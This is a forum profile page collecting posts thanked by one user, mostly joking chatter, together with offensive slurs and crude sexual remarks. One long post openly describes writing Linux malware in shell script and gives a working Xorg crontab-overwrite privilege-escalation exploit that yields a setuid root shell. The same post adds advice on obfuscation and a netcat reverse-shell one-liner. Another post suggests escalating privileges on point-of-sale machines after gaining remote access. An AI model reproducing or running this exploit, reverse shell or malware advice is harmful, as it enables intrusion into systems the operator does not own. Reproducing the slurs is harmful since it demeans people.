User Controls

  1. 1
  2. 2
  3. 3
  4. 4
  5. ...
  6. 34
  7. 35
  8. 36
  9. 37

Posts That Were Thanked by SBTlauien

  1. Sophie Pedophile Tech Support
    PoisonTap for rPi Zero is fun btw.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. Originally posted by Lanny Why don’t you cash me outside nigga

    Why don’t you cache me outside nigga
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. Lanny Bird of Courage
    Originally posted by frala Pfft what do you know about cash registers meet me outside

    Why don’t you cash me outside nigga
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. Sophie Pedophile Tech Support
    Things like Cash Registers run on Debian, the subway in my neck of the woods runs on Debian too. ATMs will vary between Windows XP and 7, and if you have a payment system that is not directly affiliated with a bank it will almost always run on Linux.

    Those little boxes that can scan your credit card at restaurants generally have some proprietary stuff on ARM Architecture. So that may be a bitch.


    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-

    import os

    if 'WINDOWS' in os.getenv('PATH'):
    print("You're on Windows, bro")
    elif '/bin/sh' in os.getenv('PATH'):
    print("Some Linux flavor")


    OS Module has a bunch of methods as useful as those illustrated above. You can compile to exe with Pyinstaller. And you can either download a static binary of the Python Interpreter for use on Linux or pack your Python program with everything it needs.

    If you manage to gain remote access make sure to download RootHelper from my repo to the device you're on. I designed it for enumeration and privilege escalation. Maybe write something in PowerShell for Windows, or just keep everything Python.
    As a matter of fact, for my personal use i have a variant of RootHelper written in C, obfuscated, encoded, and it uses LD_PRELOAD so no worries with regards to compatibility.
    The following users say it would be alright if the author of this post didn't die in a fire!
  5. The following users say it would be alright if the author of this post didn't die in a fire!
  6. Originally posted by BeeReBuddy but was wondering if anyone else has had similar issues dealing with forgetful old people…

    I think so but I don't remember.
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. They cloned your SIM card.
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. Why not just wait till the store opens and then simply walk in?
    The following users say it would be alright if the author of this post didn't die in a fire!
  9. The thing with this is a lot of closures have a recessed post the lock post butts up to, so you can't get at the locking mechanism. Also, many use the shoot bolt mechanism instead, so this wouldn't work with those. A quarter turn of the key lock releases the spring loaded shoot bolts top and bottom. The shoot bolts are inserted into drilled holes top and bottom.
    The following users say it would be alright if the author of this post didn't die in a fire!
  10. Originally posted by SBTlauien Not sure if this has been common knowledge but I just saw the video when it was post at the beginning of February. The security alarm can possibly be bypassed as well but the are usually security cameras everywhere(I don't think these are usually monitored and are just used for investigating and deterrence). Burglary isn't really my thing but I thought this was interesting.

    Your video closing tag is upside down.

    The following users say it would be alright if the author of this post didn't die in a fire!
  11. Sophie Pedophile Tech Support
    If i can't be bothered with veracrypt because it will take forever and encryptpad is just a hassle. I simply use OpenSSL fom the terminal, but typing out commands is a hassle again. So what i will do is write multiple scripts for things i need to automate often and keep those updated and optimize them every now and then.

    I thought you might be interested in my latest iteration of quick encryption script.


    EDIT: Whoops forgot an echo, fixed.
    EDIT2: Debugging, it's good practice.

    #!/bin/bash

    ESC="\x1b["
    RESET=$ESC"39;49;00m"
    RED=$ESC"31;01m"

    # Generate random password of arbitrary length
    generate(){
    follow_up=$1
    clear && echo -e "Generate Random Password"

    echo -e "\nAmount of characters in generated password?"
    read -p "[Integer]: " amount

    sleep 0.5 clear

    cat /dev/random | LC_ALL=C tr -dc 'a-zA-Z0-9' | head -c$amount

    echo -e "Your randomly generated password is: $amount"
    echo -e "Do not lose it!"
    read -p "Enter any button to resume..." null

    if [[ follow_up == "true" ]]; then encode; fi

    };

    # Encoding ops
    encode(){
    clear && echo -e "Encode File\n"
    read -p 'File: ' infile
    echo -e 'Password: \n'
    read -s password
    openssl enc -aes256 -e -k $password -pbkdf2 -in '$infile' -out '$infile.enc'
    openssl enc -a -in $infile -out '$infile.enc.pem'

    echo -e "\nDone!\n" && sleep 1.5
    exit 0

    };

    # Decoding ops
    decode(){
    clear && echo -e "Decode File\n"
    read -p 'File: ' infile
    echo -e 'Password: \n'
    read -s password
    openssl enc -d -aes256 -k $password -pbkdf2 -in '$infile.enc' -out '$infile.b64'
    read -p 'Outfile format ' outfile
    openssl enc -a -d -in '$infile.b64' -out $outfile

    echo -e "\nDone!\n" && sleep 1.5
    exit 0
    };


    # Parse CLI
    if [[ "$1" != "" ]]; then
    case $1 in
    '-e' | '--encode' )
    encode
    esac

    elif [[ "$1" != "" ]]; then
    case $1 in
    '-d' | '--decode' )
    decode
    esac

    elif [[ "$1" != "" ]]; then
    case $1 in
    '-g' | '--gen-pass' )
    generate "false"
    esac

    elif [[ "$1" == "-e" || "$1" == "--encode" ]]; then
    if [[ "$1" != "" && "$2" != "" ]]; then
    case $2 in
    '-g' | '--gen-pass' )
    generate "true"
    esac
    fi

    else
    clear
    echo -e "\n$RED[!] Unhandled Option$RESET"
    echo -e "\nThis script expects at least one valid CLI argument."
    echo -e "./script.sh --encode [-e]"
    echo -e "./script.sh --decode [-d]"
    echo -e "./script.sh --gen-pass [-g]\n"

    echo -e "To encode file with a randomly generated password"
    echo -e "please pass the following as command line options:\n"

    echo -e "./script.sh --encode [-e] --gen-pass [-g]\n"
    sleep 1 && exit 1
    fi



    I know, nothing ground breaking, but solid and reliable, and hey if you want some extra security the output gets base64, so you could hide these files among your genuine certs and such.
    The following users say it would be alright if the author of this post didn't die in a fire!
  12. Originally posted by Donald Trump I earn about 15c a day from my CPU mining

    Gross or Net?
    The following users say it would be alright if the author of this post didn't die in a fire!
  13. Obbe Alan What? [annoy my right-angled speediness]
    My wife told me she no longer loves me and wants to separate.

    I'm just venting here because I don't have anywhere else to.

    This has not been a good year for me.
    The following users say it would be alright if the author of this post didn't die in a fire!
  14. aldra JIDF Controlled Opposition
    not for credit cards
    The following users say it would be alright if the author of this post didn't die in a fire!
  15. aldra JIDF Controlled Opposition
    I've done some low-level arduino radio projects; trasmitting data back and forth isn't difficult once you've got the connection set up but trying to adapt SSH to work that way would be a lot of work
    The following users say it would be alright if the author of this post didn't die in a fire!
  16. Once you're old, you realize that everything in the past is in the past and no longer matters. It's no longer relevant. All that matters at that point is who you are at that moment.
    The following users say it would be alright if the author of this post didn't die in a fire!
  17. POLECAT POLECAT is a motherfucking ferret [my presentably immunised ammonification]
    I only regret not fucking that 19 year old big titty'd white trash blonde whit girl 6 years ago,, but had I I may be regretting even doing that
    The following users say it would be alright if the author of this post didn't die in a fire!
  18. Ajax African Astronaut [rumor the placative aphakia]
    As people age, I think people regret more the things they didn’t do than the things they did.
    The following users say it would be alright if the author of this post didn't die in a fire!
  19. Kev Space Nigga
    Originally posted by Wariat its hard sometimes tho is you dont know where to look plus they use guys or play hard to get.

    thats why its best to fuck around in your teens when they are the most pleasant they ever will be and the only period of time that a female will like you for you.
    The following users say it would be alright if the author of this post didn't die in a fire!
  20. Sophie Pedophile Tech Support
    Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.

    So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.

    What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.

    Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.

    Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.

    Here's an example.


    #!/bin/bash


    # There are a bunch of vulns in the Xorg server and related utils like
    #
    # X.Org xorg-x11-xfs - Local Race Condition
    # xorg-x11-server - 'inittab Local Privilege Escalation
    #
    # And much more, we're gonna do the second one as an example
    #
    # When ##!!## occurs in the script i got some annotations below
    #
    cat << EOF > /tmp/x_orgasm
    cp /bin/sh /usr/local/bin/pwned ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
    chmod 4777 /usr/local/bin/pwned
    EOF

    chmod +x /tmp/x_orgasm


    # prepare your anus
    cd /etc
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
    sleep 5
    pkill Xorg ##!!##_4

    sleep 120

    ls -l /etc/crontab*
    ls -l /usr/local/bin/pwned

    # Start elevated Sh
    /usr/local/bin/pwned


    ##!!##_1
    Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
    If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.


    Alternatively we could ship a shell in Asm with the payload up top.

    ##!!##_2

    /tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.

    /usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x


    ##!!##_3

    The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.

    Obfuscation

    There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.


    String/Hex Hash, 1 Iteration
    Token/ForCode, 1 Iteration


    Find the result here

    Or if you prefer a picture check the spoiler out below.




    Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.

    I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:


    #!/usr/bin/env -S sh\_"umask\_700"\_-f
    # BTW This is legal right ^
    #
    # I'm U_masking because i am writing stuff out
    # Under a specific user account

    buff_ops()
    { # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
    cmd=$0
    arg=$1
    mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
    };

    buff_ops CMD ARG # <- is what i want


    I figured it should be good since stuff like this works also:

    rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x


    Thicc threads niggas. One on low level security and dev incoming soon as well.
    The following users say it would be alright if the author of this post didn't die in a fire!
  1. 1
  2. 2
  3. 3
  4. 4
  5. ...
  6. 34
  7. 35
  8. 36
  9. 37
Jump to Top